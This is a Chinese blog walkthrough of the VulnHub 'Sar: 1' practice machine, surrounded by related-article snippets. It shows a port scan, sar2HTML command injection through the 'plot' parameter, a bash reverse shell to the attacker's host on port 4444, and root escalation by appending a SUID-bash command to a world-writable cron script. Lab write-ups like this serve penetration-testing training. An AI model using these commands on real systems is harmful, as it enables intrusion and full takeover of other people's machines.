Vulnhub:Sar 1靶机

已于 2023-06-07 23:28:02 修改
阅读量90 收藏
点赞数
文章标签: 安全 网络安全 web安全
于 2023-04-21 15:20:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/130289569
版权

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

查看目标网站robots.txt,提示存在一个目录sar2HTML

访问sar2HTML目录发现是sar2HTML CMS

搜索后发现该CMS存在远程代码执行

searchsploit sar2HTML

漏洞利用

执行命令

http://192.168.111.130/sar2HTML/index.php?plot=;命令

反弹shell需要url编码

bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/4444 0>&1'

提权

查看目标计划任务,发现每5分钟以root身份执行/var/www/html/finally.sh

finally.sh会执行write.sh,而write.sh有777权限,修改write.sh提升为root

echo 'chmod 4777 /bin/bash' >> write.sh
/bin/bash -p

ctostm
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SAR-PROCESSING:SAR图像处理算法
04-02
SAR处理 处理SAR图像的功能。 这些功能允许通过分解为脚本的分解查看大型SAR图像。 要运行脚本,您需要使用读取功能将图像加载到内存中,输入行和列编号,可以在图像随附的.ann文件中找到。 图像可以二进制格式从...
sar成像matlab代码-SAR-coregistration-repl:SAR-注册-repl
06-03
SAR/SAR 配准,然后用于其他遥感图像配准,包括异构图像配准(例如 LIDAR/SAR、光学/ SAR、高光谱/光学等) 我们希望此代码会有所帮助,我们将继续为您服务,我们有兴趣回复您的评论。 {ge ,e, _}Folki 算法的引用:...
vulnhub:Sar
cjstang的博客
06-16 758
OSCP-2:这次练习的靶机vulnhub平台下的sar,该靶机是一个类似oscp的虚拟机,目的是提高并巩固渗透测试的知识点。 主要利用方式:sar2HTML命令执行反弹shell(可php文件上传反弹shell)+定时脚本提权......
vulnhub 靶机渗透:SAR: 1
Mysmycbx的博客
05-16 286
发现了robots.txt,打开发现sar2HTML,打开http://192.168.54.13/sar2HTML,发现是个工具,且告诉了版本号。可以root权限执行write.sh,但可以修改write.sh,那就修改为反弹shell。,既然是工具就可能存在漏洞,去searchsploit搜一下。发现执行成功了,那就说明该漏洞是存在的。然后静静地等待5分钟,就获取了root权限的反弹shell。发现有个root权限执行的定时任务,且5分钟执行一次。发现了2个且版本都是对应的,试试。
VulnhubSar-1
ki10Moc的博客
07-21 221
垃圾文章不要看
Vulnhub靶机SAR_ 1
LainWith的博客
08-20 206
Sar(此系列共1台)发布日期:2020 年 2 月 15 日难度:初级运行环境:VMware目标:取得Root权限nmap漏扫脚本目录爆破远程代码执行计划任务提权。
Vulnhub-靶机-Sar 1
qq_43264813的博客
01-27 1156
Vulnhub靶机Sar 1 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/sar-1,425/ 文章目录Vulnhub靶机Sar 1一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.110.0/24 【步骤二】对目标靶机进行全端口扫描: 【命令】nmap -n -sC -s
[VulnHub靶机渗透] Sar: 1
人若无名,便可专心练剑
02-07 954
靶机精讲 之 SARvulnhub靶机,盲打这台机器吧,老手测试一下宝刀,新手验证一下成长!标准的攻击链,却也需要你的腾挪躲闪。sar2html利用获得立足点,自动任务提权,很简单,但也未必打得很顺利,实战就是这样,大处的利用你要会,小的知识点、技能点也不能含糊。小试牛刀一下,you can do it!
vulnhub Sar: 1
箭雨镜屋
05-04 1217
渗透思路:nmap扫描----dirb扫描网站目录----exploit-db查找exp----利用sar2html的RCE漏洞getshell(base64编码)----利用定时任务提权
【打靶练习】vulnhub Sar: 1
守拙的博客
06-13 152
方式反弹shell均失败,猜测在这个环境下很多命令无法执行,可以利用文件上传上传一个webshell,或者上传一个php的反弹shell脚本,然后触发执行。收集到的信息:系统Ubuntu、软件apache、默认web路径/var/www/html/index.html。发现定时任务中,root用户通过finally.sh执行了write.sh,而write.sh当前用户可写。同时,发现存在文件上传功能,但是不知道上传路径无法直接利用。经过搜索,发现文件上传路径为/var/www/html/
vulnhub sar 靶场练习
鸥鹭忘机
09-07 2060
前言 这次练习的靶机vulnhub平台下的sar,该靶机是一个类似oscp的虚拟机,目的是提高并巩固渗透测试的知识点。下载地址为https://www.vulnhub.com/entry/sar-1,425/。这个靶机中没有出现新的知识点,难度相对比较简单。如果看过我前面vulnhub DC系列的文章,那么这次靶机可以独立自主完成。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击sar靶机,然后选中配置。依次点击网络配置->NAT模式->高
pylearn2_cnn:SAR图像的深度学习
06-08
pylearn2_cnn SAR图像的深度学习
SAR图像处理1
05-12
SAR图像处理1 SAR 课件 SAR学习入门的教材
matlab三维图像代码-sar:SAR成像的自动聚焦和图像处理算法
05-20
该存储库包含用于SAR图像处理和自动聚焦算法的所有源代码。 有关详细信息,请参阅每个子目录的README 。 data_collection 所有用于实时收集雷达数据的程序。 2d_autofocus 与3d_autofocus类似,但仅适用于二维光圈。...
安全】Linux Fanotify使用入门
追寻梦想的青春
06-19 657
fanotify是另一种文件监控机制,在使用上两者类似,都是先调用init函数初始化句柄,然后调用类似watch的函数添加监控路径,再使用select+read的方式读取出变化的事件,根据事件中给出的参数获取文件的路径、事件类型以及其他需要的数据。如果是监控主机上的路径,directed结合FAN_EVENT_ON_CHILD标志就只能监控目录以及目录下的文件,per-mount可以监控pathname所在的挂载点中所有文件或者目录的变化,而global模式可以监控整个文件系统。
c++中串口的安全封装使用
最新发布
jjjxxxhhh123的博客
06-21 198
对于内置类型,如果不显式初始化,它们的值是未定义的,可能包含任何内容。在你的代码中,buffer是一个字符数组,不需要显式初始化,因为你马上就会用::read函数把数据填充进去。字符串构造:如果::read返回负值,那么std::string(buffer, bytes_read)中的bytes_read将是负值,这会导致未定义行为。你需要确保bytes_read是非负的。在上述代码中,我添加了对read函数返回值的检查,以确保没有发生错误。如果::read返回负值,我们将抛出一个异常,以指示读取失败。
安全】软件系统安全开发指南文件(指南)
xx_123321456的博客
06-21 173
2.2.应用系统软件功能安全设计要求。2.1.应用系统架构安全设计要求。2.5.应用系统数据库安全设计要求。2.3.应用系统存储安全设计要求。2.4.应用系统通讯安全设计要求。2.6.应用系统数据安全设计要求。
企业防盗版,如何保障上网安全
shenxinda_lu的博客
06-20 224
当需要访问互联网时,用户在隔离沙盒内进行操作,确保主机与互联网物理隔离,只有沙盒能够访问互联网,且沙盒与本机隔离。
vulnhub sar
09-09
vulnhub sar是一个类似OSCP的虚拟机,它旨在帮助用户提高和巩固渗透测试的知识点。如果你想下载sar靶机,你可以在GitHub上找到它,具体来说,你可以在pentestmonkey的php-reverse-shell存储库中找到它。如果你已经...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值